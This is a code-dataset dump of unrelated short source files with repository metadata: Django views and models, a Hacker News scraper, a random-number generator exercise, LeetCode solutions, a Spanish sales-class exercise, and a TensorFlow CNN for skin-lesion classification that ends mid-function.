    String = lambda *args, **kwargs: None
    all_operations = None
def _import():
    """Rebind the placeholder module globals to the real AST classes.

    Deferred so the circular dependency between this package and its
    submodules (which themselves import from claripy) can resolve.
    """
    global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
    from .bits import Bits
    from .bv import BV
    from .vs import VS
    from .fp import FP
    from .bool import Bool, true, false
    from .int import Int
    from .base import Base
    from .strings import String
    from .. import ops as all_operations
# Public API of this package.
__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
| [
"noreply@github.com"
] | angr.noreply@github.com |
ddbeff68f2104fbd657620867d9acc172c5adecb | 3af6960c805e9903eb27c09d8bc7ebc77f5928fe | /problems/0190_Reverse_Bits/__init__.py | 13d13496fce71652ff8239e68ab130a72e9cc66e | [] | no_license | romain-li/leetcode | b3c8d9d4473eebd039af16ad2d4d99abc2768bdd | 5e82b69bd041c2c168d75cb9179a8cbd7bf0173e | refs/heads/master | 2020-06-04T20:05:03.592558 | 2015-06-08T18:05:03 | 2015-06-08T18:05:03 | 27,431,664 | 2 | 1 | null | 2015-06-08T18:05:04 | 2014-12-02T12:31:58 | Python | UTF-8 | Python | false | false | 656 | py | ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
| [
"romain_li@163.com"
] | romain_li@163.com |
d3b5e095fa1dab8e9c98895fa11a48312d856b56 | 874f46f4510b321ec3110ac8d5d5e572175c5544 | /Generator_Tests/TestFrec/scripts/generator.py | 94df7463f40e16990b3f6614572ff87accc2eb5a | [] | no_license | JordiEspinozaMendoza/Simulacion | bb271aee0908693ff0e36470dae98216096d9066 | fac1cdf5010a34a853a8b13d93209bcbde616e64 | refs/heads/main | 2023-05-31T14:06:21.329271 | 2021-06-14T02:52:06 | 2021-06-14T02:52:06 | 367,148,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | import sys
import os
import pandas as pd
sys.setrecursionlimit(5000)  # the generator recurses once per draw; the default limit is too low
# Linear congruential generator parameters:
#   X = seed, a = multiplier, c = additive constant, m = modulus
def Operacion(X, a, c, m):
    """Return the next LCG term, (a*X + c) mod m."""
    return (a * X + c) % m
def createDataFrame(data):
    """Wrap the generator output in a table; return (text, frame, column names)."""
    frame = pd.DataFrame(data, columns=["n", "Xn", "Xn+1", "Rn"])
    return frame.to_string(), frame, list(frame.columns)
def Recursivo(self, X0, a, c, m, conta,Detener, ArraySemilla, data):
try:
for Semilla in ArraySemilla:
if X0==Semilla:
Detener = True
if Detener==True or conta==325:
pass
else:
data["n"].append(conta+1)
data["Xn"].append(X0)
data["Xn+1"].append(Operacion(X0,a,c,m))
data["Rn"].append(Operacion(X0,a,c,m)/m)
conta = conta + 1
ArraySemilla.append(X0)
Recursivo(Operacion(X0,a,c,m),a,c,m,conta,Detener, ArraySemilla, data)
except Exception as e:
print(str(e))
| [
"jordi8101@gmail.com"
] | jordi8101@gmail.com |
7e595d3e782adea8924f7a1dd1432bd467b968e7 | 6ede75099fc38a682e030d70051389ea182d6cc2 | /ともき本番/incomeexpensesapi/menu/migrations/0028_foodstuff_myrecipe_usereat.py | b1c52866aa49cd76e4c04d5b33843c23ec472259 | [] | no_license | hangtran93tk/team06 | 0d86e59be866d7f6bda1b6c81f725ca1f80eba0f | 89000be20c18d3b9610c240b25c7c1944fc68d6d | refs/heads/master | 2023-03-12T11:58:03.802711 | 2021-02-26T03:51:36 | 2021-02-26T03:51:36 | 279,473,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | # Generated by Django 3.0.5 on 2020-12-20 06:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration for the menu app: adds the Foodstuff,
    UserEat and MyRecipe tables.  Generated by ``makemigrations``; do not
    hand-edit the field definitions."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('menu', '0027_menuinfo'),
    ]
    operations = [
        migrations.CreateModel(
            name='Foodstuff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, null=True)),
                ('one_point_gram', models.FloatField()),
                ('one_point', models.FloatField()),
                ('two_point', models.FloatField()),
                ('three_point', models.FloatField()),
                ('four_point', models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name='UserEat',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Meal slot; the choice labels are Japanese (breakfast/lunch/dinner/snack).
                ('eatTime', models.IntegerField(choices=[(1, '朝食'), (2, '昼食'), (3, '夕食'), (4, '間食')])),
                ('date', models.DateField(auto_now_add=True)),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatmenu', to='menu.MenuInfo')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatuser', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='MyRecipe',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gram', models.FloatField()),
                ('foodstuff', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipestuff', to='menu.Foodstuff')),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipemenu', to='menu.MenuInfo')),
            ],
        ),
    ]
"18jz0129@jec.ac.jp"
] | 18jz0129@jec.ac.jp |
593c5efa70cba81b2a1c8e74a4bd3a4e8bf6c73c | 1bf512659c750eba27896ad5d1a5ad61fe08c0e4 | /musicrest/apps/api/models.py | 79348bd25ffd3e745eb1e479628b244e86f1bfc0 | [] | no_license | jeremyhilado/python-django-mini-project | fc80976e8576aa1eab9269521131107936bf8502 | 492e301e80266f1a44ba8ba3e5649af4992c836e | refs/heads/master | 2023-08-17T19:43:03.052514 | 2020-06-06T18:13:33 | 2020-06-06T18:13:33 | 261,493,243 | 0 | 0 | null | 2021-09-22T18:58:26 | 2020-05-05T14:22:20 | Python | UTF-8 | Python | false | false | 535 | py | from django.db import models
from apps.authentication.models import User
# Create your models here.
class Artist(models.Model):
    """A musical artist record owned by a User; ``is_public`` controls
    whether the record is exposed beyond its owner."""
    name = models.CharField(max_length=255)
    genre = models.CharField(max_length=255)
    biography = models.TextField(blank=True)  # optional free-form text
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)  # refreshed on every save
    owner = models.ForeignKey(User, on_delete=models.CASCADE)  # deleting the user deletes their artists
    is_public = models.BooleanField(default=True)
    def __str__(self):
        # Human-readable representation (used e.g. by the Django admin).
        return self.name
"jhilado89@gmail.com"
] | jhilado89@gmail.com |
af9bf83cfaf55cd781211bfc9927638d904f30f8 | 975b2d421d3661e6770b601929d5f11d981d8985 | /msgraph/generated/sites/item/term_stores/item/groups/item/sets/item/children/item/children/item/relations/item/set/set_request_builder.py | 8ad5043efe01acfd37aa331d26266f34c018c4b3 | [
"MIT"
] | permissive | microsoftgraph/msgraph-sdk-python | a7c551b85daadeebf76ec4ae12668664ea639b42 | 27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949 | refs/heads/main | 2023-09-03T21:45:27.989672 | 2023-08-31T06:22:18 | 2023-08-31T06:22:18 | 534,665,999 | 135 | 18 | MIT | 2023-09-14T11:04:11 | 2022-09-09T14:00:17 | Python | UTF-8 | Python | false | false | 4,960 | py | from __future__ import annotations
from dataclasses import dataclass, field
from kiota_abstractions.base_request_builder import BaseRequestBuilder
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors.o_data_error import ODataError
from ................models.term_store.set import Set
class SetRequestBuilder(BaseRequestBuilder):
    """
    Provides operations to manage the set property of the microsoft.graph.termStore.relation entity.
    Auto-generated by Kiota; edit with care.
    """
    def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
        """
        Instantiates a new SetRequestBuilder and sets the default values.
        Args:
            path_parameters: The raw url or the Url template parameters for the request.
            request_adapter: The request adapter to use to execute the requests.
        """
        # RFC 6570 URL template; %2D/%24 are the encoded '-' and '$' characters.
        super().__init__(request_adapter, "{+baseurl}/sites/{site%2Did}/termStores/{store%2Did}/groups/{group%2Did}/sets/{set%2Did}/children/{term%2Did}/children/{term%2Did1}/relations/{relation%2Did}/set{?%24select,%24expand}", path_parameters)
    async def get(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> Optional[Set]:
        """
        The [set] in which the relation is relevant.
        Args:
            request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
        Returns: Optional[Set]
        """
        request_info = self.to_get_request_information(
            request_configuration
        )
        # Deferred import: avoids a circular dependency in the generated models package.
        from ................models.o_data_errors.o_data_error import ODataError
        # Any 4XX/5XX response body is deserialized into a typed ODataError.
        error_mapping: Dict[str, ParsableFactory] = {
            "4XX": ODataError,
            "5XX": ODataError,
        }
        if not self.request_adapter:
            raise Exception("Http core is null")
        from ................models.term_store.set import Set
        return await self.request_adapter.send_async(request_info, Set, error_mapping)
    def to_get_request_information(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
        """
        The [set] in which the relation is relevant.
        Args:
            request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
        Returns: RequestInformation
        """
        request_info = RequestInformation()
        request_info.url_template = self.url_template
        request_info.path_parameters = self.path_parameters
        request_info.http_method = Method.GET
        request_info.headers["Accept"] = ["application/json"]
        if request_configuration:
            request_info.add_request_headers(request_configuration.headers)
            request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
            request_info.add_request_options(request_configuration.options)
        return request_info
    @dataclass
    class SetRequestBuilderGetQueryParameters():
        """
        The [set] in which the relation is relevant.
        """
        def get_query_parameter(self,original_name: Optional[str] = None) -> str:
            """
            Maps the query parameters names to their encoded names for the URI template parsing.
            Args:
                original_name: The original query parameter name in the class.
            Returns: str
            """
            if not original_name:
                raise TypeError("original_name cannot be null.")
            if original_name == "expand":
                return "%24expand"
            if original_name == "select":
                return "%24select"
            return original_name
        # Expand related entities
        expand: Optional[List[str]] = None
        # Select properties to be returned
        select: Optional[List[str]] = None
    from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
    @dataclass
    class SetRequestBuilderGetRequestConfiguration(BaseRequestConfiguration):
        from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
        """
        Configuration for the request such as headers, query parameters, and middleware options.
        """
        # Request query parameters
        query_parameters: Optional[SetRequestBuilder.SetRequestBuilderGetQueryParameters] = None
| [
"GraphTooling@service.microsoft.com"
] | GraphTooling@service.microsoft.com |
cb4ceece3e859d4af57c7b4bc35b7c12546e1c09 | b329784883875fea0d655f4371549c400ab876a7 | /news.py | 5cc3035a0d6bf571d225ffb8a12fb412c8575b22 | [] | no_license | veekaybee/markovhn | 9ce8b4159c483bbc0629bf9cc51d0eba591bd553 | 99f5eefc292fc511d1f89b1acbf1ba0199245b16 | refs/heads/master | 2021-01-23T18:50:48.906754 | 2015-08-24T11:46:41 | 2015-08-24T11:46:41 | 41,229,413 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | import urllib2
import json
# Python 2 script (urllib2): dump the titles of all current HN top stories.
#HackerNews API documentation: https://github.com/HackerNews/API
api_url='https://hacker-news.firebaseio.com/v0/topstories.json'
item_url='https://hacker-news.firebaseio.com/v0/item/'
#Pull all story numbers into a Python data dictionary
response = urllib2.urlopen(api_url)
data=json.load(response)
#Takes each story number and extracts the title by treating as Python dictionary
# One HTTP round-trip per story id (typically ~500 ids), so this is slow but simple.
with open("headlines.txt", "w") as output_file:
    for i in data:
        genurl="%s%s.json?print=pretty" % (item_url, i)
        item_response=urllib2.urlopen(genurl)
        parsed_response=json.load(item_response)
        # NOTE(review): titles are written back-to-back with no separator;
        # add a '\n' here if downstream tooling expects one headline per line.
        output_file.write(parsed_response["title"].encode('utf-8'))
| [
"vicki.boykis@gmail.com"
] | vicki.boykis@gmail.com |
11c23983d7ab4baebc227f5160e0120c3f42e04c | c0397a0617f2603dc5dbd0af44462e561a52ea18 | /views.py | 1b14f569ef0fd7a8ea1427db41bf9e8082f69ff5 | [] | no_license | PujariSrinivas/Django | c865dddfaef3e7221597cf9f5e911241300d2825 | e94333926daef4a478ffa83c0f6c997700427696 | refs/heads/master | 2023-06-05T19:14:55.633274 | 2021-06-25T04:50:41 | 2021-06-25T04:50:41 | 378,155,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,054 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
    """Landing view: return a plain-text greeting."""
    message = "Hi Good Evening to All..."
    return HttpResponse(message)
def htmltag(request):
    """Return a static HTML heading.

    Consistency fix: the request parameter was named ``y``; renamed to
    ``request`` to match every sibling view (Django passes it positionally,
    so callers are unaffected).
    """
    return HttpResponse("<h2>Hi Welcome to APSSDC</h2>")
def usernameprint(request, uname):
    """Greet the user whose name was captured from the URL."""
    markup = "<h2>Hi Welcome <span style='color:green'>{}</span></h2>".format(uname)
    return HttpResponse(markup)
def usernameage(request, un, ag):
    """Render a centered name/age banner from URL parameters ``un`` and ``ag``."""
    html = "<h3 style='text-align:center;background-color:green'>My name is <span style='color:yellow'>{}</span> and my age is: <span style='color:red'>{}</span></h3>".format(un, ag)
    return HttpResponse(html)
def empdetails(request, eid, ename, eage):
    """Show employee details plus a JS alert greeting.

    Note the format-argument order: ename is used twice, then eage, then eid.
    """
    body = "<script>alert('Hi Welcome {}')</script><h3>Hi Welcome {} and your age is {} and your id is {}</h3>"
    return HttpResponse(body.format(ename, ename, eage, eid))
def htm(request):
    """Serve the static HTML-basics demo page."""
    template_name = 'html/basics.html'
    return render(request, template_name)
def ytname(request, name):
    """Render ytname.html with the URL-captured name under context key 'n'."""
    context = {'n': name}
    return render(request, 'html/ytname.html', context)
def empname(request, id, name):
    """Render ehtml.html with id/name under context keys 'i'/'n'.

    ``id`` shadows the builtin but is kept: the URLconf binds it by name.
    """
    return render(request, 'html/ehtml.html', {'i': id, 'n': name})
def studentdetails(request):
    """Serve the static student-details page."""
    template_name = 'html/stud.html'
    return render(request, template_name)
def internaljs(request):
    """Serve the internal-JavaScript demo page."""
    template_name = 'html/internaljs.html'
    return render(request, template_name)
def myform(request):
    """GET: show the entry form.  POST: echo the submitted fields back on the
    display page (and trace them to the server console)."""
    if request.method != "POST":
        return render(request, 'html/form.html')
    uname = request.POST['uname']
    rollno = request.POST['rollno']
    email = request.POST['email']
    print(uname, rollno, email)  # server-side trace of the submission
    context = {'username': uname, 'rno': rollno, 'emailid': email}
    return render(request, 'html/display.html', context)
def bootstrap(request):
    """Serve the Bootstrap demo page."""
    template_name = 'html/boot.html'
    return render(request, template_name)
def Registration(request):
    """Registration page.  POST submissions are read and logged; every request
    (GET or POST) is answered with the Registration template.

    Bug fix: the final ``return`` was nested inside the POST branch, so plain
    GET requests returned ``None`` and Django raised an error.  The POST
    response is unchanged (same template, no context, as before).
    """
    if request.method == "POST":
        fname = request.POST['fname']
        lname = request.POST['lname']
        rollno = request.POST['rollno']
        email = request.POST['email']
        phoneno = request.POST['phoneno']
        print(fname, lname, rollno, email, phoneno)  # server-side trace
        # NOTE(review): this context is built but never passed to render(),
        # mirroring the original behaviour; pass it once the template uses it.
        data = {'firstname': fname, 'lastname': lname, 'rno': rollno, 'emailid': email, 'pno': phoneno}
    return render(request, 'html/Registration.html')
| [
"noreply@github.com"
] | PujariSrinivas.noreply@github.com |
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75 | eb61d62ca1f6f0123e3771105f5dfbbd6115138d | /.history/23-08-21_20210912011408.py | d242edf35564cc66ff35c5dd66a540fa6f9fc0b8 | [] | no_license | Alopezm5/CORRECTO-2 | e0f14bcc3a88c0e222d10e3261e68532008bc42e | 223613f1fb04dce3fac9f82f243cb2f22fe100f3 | refs/heads/main | 2023-07-29T06:52:48.147424 | 2021-09-12T20:33:27 | 2021-09-12T20:33:27 | 388,995,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | class Empresa:
def __init__(self,nom="El mas barato",ruc="0999999999",tel="042971234",dir="Juan Montalvo"):
self.nombre=nom
self.ruc=ruc
self.telefono=tel
self.direccion=dir
def mostrarEmpresa(self):
print("Empresa: {:17}, RUC: {}".format(self.nombre,self.ruc))
class Cliente:
    """Base customer record: name, national id (cedula) and phone number."""
    def __init__(self, nom, ced, tel):
        self.nombre, self.cedula, self.telefono = nom, ced, tel
    def mostrarCliente(self):
        """Print the raw customer fields on one line."""
        print(self.nombre, self.cedula, self.telefono)
class ClienteCorporativo(Cliente):
    """Corporate customer: a Cliente plus a private contract identifier.

    Bug fix: the original ``__init__`` declared one fused parameter
    ``telecontrato`` yet forwarded the undefined names ``tele`` and
    ``contrato`` to ``Cliente.__init__`` (which takes no contract argument),
    so the class could never be instantiated.
    """
    def __init__(self, nomb, cedu, tele, contrato):
        super().__init__(nomb, cedu, tele)
        self.__contrato = contrato
    @property
    def contrato(self):
        """Getter: return the private contract value."""
        return self.__contrato
    @contrato.setter
    def contrato(self, value):
        """Setter: falsy values (None, "", 0) fall back to a no-contract marker."""
        if value:
            self.__contrato = value
        else:
            self.__contrato = "Sin contrato"
    def mostrarCliente(self):
        """Print name and contract (overrides Cliente.mostrarCliente)."""
        print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
    """Retail customer: a Cliente with a read-only promotion flag."""
    def __init__(self, nom, ced, tel, promocion=True):
        super().__init__(nom, ced, tel)
        self.__promocion = promocion
    @property
    def promocion(self):
        """Read-only accessor for the private promotion flag."""
        return self.__promocion
    def mostrarCliente(self):
        """Print name and promotion flag (overrides Cliente.mostrarCliente)."""
        print(self.nombre, self.__promocion)
class Articulo:
    """Inventory article; ``codigo`` is auto-assigned from a class counter."""
    secuencia = 0  # running counter shared by all instances
    iva = 0.12     # VAT rate -- a class constant, not a method
    def __init__(self, des, pre, sto):
        Articulo.secuencia += 1
        self.codigo = Articulo.secuencia
        self.descripcion = des
        self.precio = pre
        self.stock = sto
    def mostraArticulo(self):
        """Print code and description.

        Bug fix: the original printed ``self.nombre``, an attribute that is
        never set (the field is ``descripcion``), raising AttributeError on
        every call.
        """
        print(self.codigo, self.descripcion)
class DetVenta:
    """One sale line: a snapshot of the article's price plus quantity sold."""
    linea = 0  # class-wide line counter
    def __init__(self, articulo, cantidad):
        DetVenta.linea += 1
        self.lineaDetalle = DetVenta.linea
        self.articulo = articulo
        self.cantidad = cantidad
        self.precio = articulo.precio  # price frozen at sale time
class CabVenta:
    """Sale header: invoice metadata plus accumulated detail lines and total."""
    def __init__(self, fac, empresa, fecha, cliente, tot=0):
        self.empresa = empresa
        self.factura = fac
        self.fecha = fecha
        self.cliente = cliente
        self.total = tot
        self.detalleVen = []  # list of DetVenta lines
    def agregarDetalle(self, articulo, cantidad):
        """Append a DetVenta line for ``articulo`` and grow the running total."""
        detalle = DetVenta(articulo, cantidad)
        self.total += detalle.precio * detalle.cantidad
        self.detalleVen.append(detalle)
    def mostrarVenta(self, empNombre, empRuc):
        """Print the sale's company header.

        Bug fix: the original printed the literal, unformatted string
        'Empresa {:17} r' and ignored both parameters; it now formats the
        same way Empresa.mostrarEmpresa does.
        """
        print("Empresa: {:17}, RUC: {}".format(empNombre, empRuc))
# Demo driver exercising the classes above.
cli1 = ClientePersonal("Jose", "0912231499", "042567890", True)
cli1.mostrarCliente()  # bug fix: the original accessed the method without calling it
art1 = Articulo("Aceite", 2, 100)
art1.mostraArticulo()
art2 = Articulo("Coca Cola", 1, 200)
art2.mostraArticulo()
art3 = Articulo("Leche", 1.5, 200)
art3.mostraArticulo()
print(Articulo.iva)  # bug fix: ``iva`` is a float class attribute, not a callable
"85761855+Alopezm5@users.noreply.github.com"
] | 85761855+Alopezm5@users.noreply.github.com |
4770757cc653f027b500d6f75168f8318a702d86 | 7f2612e5132e1583e5ba9758f299a8f301f0dc70 | /FB/5-longest-palindromic-substring.py | fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a | [] | no_license | taeheechoi/coding-practice | 380e263a26ed4de9e542c51e3baa54315127ae4f | 9528b5e85b0ea2960c994ffea62b5be86481dc38 | refs/heads/main | 2022-07-09T11:22:18.619712 | 2022-06-28T14:55:51 | 2022-06-28T14:55:51 | 447,082,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Solution:
# Time O(N^2) Space O(1)
def longestPalindrome(self, s):
res = ''
for i in range(len(s)):
odd = self.is_pal(s, i, i)
even = self.is_pal(s, i, i+1)
res = max(odd, even, res, key=len)
return res
def is_pal(self, s, l, r):
while l >= 0 and r < len(s) and s[l] == s[r]:
l -= 1
r += 1
return s[l+1: r] | [
"dadac76@hotmail.com"
] | dadac76@hotmail.com |
e2450988f82302bcbaff58abb9d993b553804b16 | 0adbbf6092f5444b623ccbf3b81206d027c96b68 | /23.py | ed2e63159145735c587c65da81d422e54ba334cf | [] | no_license | c1c51/python-crap | bc3fe076e42aa0f5843879b7af56314b09e5f931 | f16782fca27ac616e043b5e1c71da8fddef0f848 | refs/heads/master | 2021-05-10T09:55:38.465484 | 2018-01-25T17:19:57 | 2018-01-25T17:19:57 | 118,942,213 | 0 | 0 | null | 2018-01-25T17:20:37 | 2018-01-25T17:02:40 | Python | UTF-8 | Python | false | false | 125 | py | w=int(input("width?"))
# Read the remaining dimensions (width ``w`` is read just above) and report
# the rectangle's area minus the area of a circle of radius r.
l=int(input("length?"))
r=int(input("radius?"))
# NOTE(review): nothing checks that the circle fits inside the rectangle,
# so the printed result can be negative; pi is hard-coded to high precision.
print((w*l)-((r*r)*3.14159265358979323846264338))
| [
"noreply@github.com"
] | c1c51.noreply@github.com |
862a41c8dfac8339006c6b0313a9a71788c0ef52 | 1fcb40f1f2a2c6b4f5ab6c612b900c7eb9517502 | /tf-tutorials/multigpu/multi_gpu_cnn.py | 1954bcca56e4a3d6e52d3c5b5927bba9e28deb39 | [] | no_license | prativa/ai-artist | 3466b7b160180d207c94429fbec2bd33b0da53c8 | ee98af787233889ed92cc84ce66104e3f7f6e84a | refs/heads/master | 2020-04-15T19:11:45.467297 | 2018-11-29T20:22:48 | 2018-11-29T20:22:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,137 | py | import tensorflow as tf
import os
import numpy as np
import math
from classification.skin import data_loader
import time
import random
from sklearn import metrics
_IMAGE_SIZE = 224  # input images are flattened 224x224 RGB
_IMAGE_CHANNELS = 3
_NUM_CLASSES = 2  # binary melanoma classification
_BATCH_SIZE = 50 # this batch size will be for each gpu, if multi gpu setup used it will consume batch_size * gpu nums in every iteration.
_EPOCHS = 1000
learning_rate = 0.0001  # SGD step size
gpu_nums=2  # number of GPU towers built by the training loop
_BATCH_SIZE_VALID = 75  # per-GPU batch size used for the validation feed
_SAVE_PATH = "./tensorboard/isic-classification-task1/"  # checkpoints + summaries
def core_model(input_img, y, num_classes):
    """Build one tower of the CNN: five conv layers (LRN + 3x3/2 max-pool
    after conv1, conv2 and conv5), two fully-connected layers and a linear
    output layer.

    Returns (softmax_linear, y_pred_cls): unscaled per-class scores and the
    argmax class per example.  ``y`` and ``num_classes`` are currently unused
    in the body (the class count comes from module-level _NUM_CLASSES).
    """
    x_image = tf.reshape(input_img, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _IMAGE_CHANNELS], name='images')
    # Helper: truncated-normal variable; if wd is set, an L2 penalty is pushed
    # onto the 'losses' graph collection.
    def variable_with_weight_decay(name, shape, stddev, wd):
        dtype = tf.float32
        var = variable_on_cpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
        if wd is not None:
            weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
            tf.add_to_collection('losses', weight_decay)
        return var
    # Helper: place variables in host memory so all GPU towers share one copy.
    def variable_on_cpu(name, shape, initializer):
        with tf.device('/cpu:0'):
            dtype = tf.float32
            var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
        return var
    # conv1: 5x5x3 -> 64 feature maps.
    with tf.variable_scope('conv1') as scope:
        kernel = variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(x_image, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv1 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv1', conv1)
        tf.summary.scalar('Convolution_layers/conv1', tf.nn.zero_fraction(conv1))
    norm1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
    pool1 = tf.nn.max_pool(norm1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
    # conv2: 5x5x64 -> 64.
    with tf.variable_scope('conv2') as scope:
        kernel = variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv2 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv2', conv2)
        tf.summary.scalar('Convolution_layers/conv2', tf.nn.zero_fraction(conv2))
    norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
    pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
    # conv3-conv5: three 3x3 conv layers at 128 maps; pooled once after conv5.
    with tf.variable_scope('conv3') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 64, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv3 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv3', conv3)
        tf.summary.scalar('Convolution_layers/conv3', tf.nn.zero_fraction(conv3))
    with tf.variable_scope('conv4') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv4 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv4', conv4)
        tf.summary.scalar('Convolution_layers/conv4', tf.nn.zero_fraction(conv4))
    with tf.variable_scope('conv5') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv5 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv5', conv5)
        tf.summary.scalar('Convolution_layers/conv5', tf.nn.zero_fraction(conv5))
    norm3 = tf.nn.lrn(conv5, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm3')
    pool3 = tf.nn.max_pool(norm3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
    with tf.variable_scope('fully_connected1') as scope:
        reshape = tf.layers.flatten(pool3)
        dim = reshape.get_shape()[1].value
        weights = variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
        biases = variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
        local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
        tf.summary.histogram('Fully connected layers/fc1', local3)
        tf.summary.scalar('Fully connected layers/fc1', tf.nn.zero_fraction(local3))
    with tf.variable_scope('fully_connected2') as scope:
        weights = variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
        biases = variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
        local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
        tf.summary.histogram('Fully connected layers/fc2', local4)
        tf.summary.scalar('Fully connected layers/fc2', tf.nn.zero_fraction(local4))
    # Linear (un-normalised) class scores; softmax is applied by the loss op.
    with tf.variable_scope('output') as scope:
        weights = variable_with_weight_decay('weights', [192, _NUM_CLASSES], stddev=1 / 192.0, wd=0.0)
        biases = variable_on_cpu('biases', [_NUM_CLASSES], tf.constant_initializer(0.0))
        softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
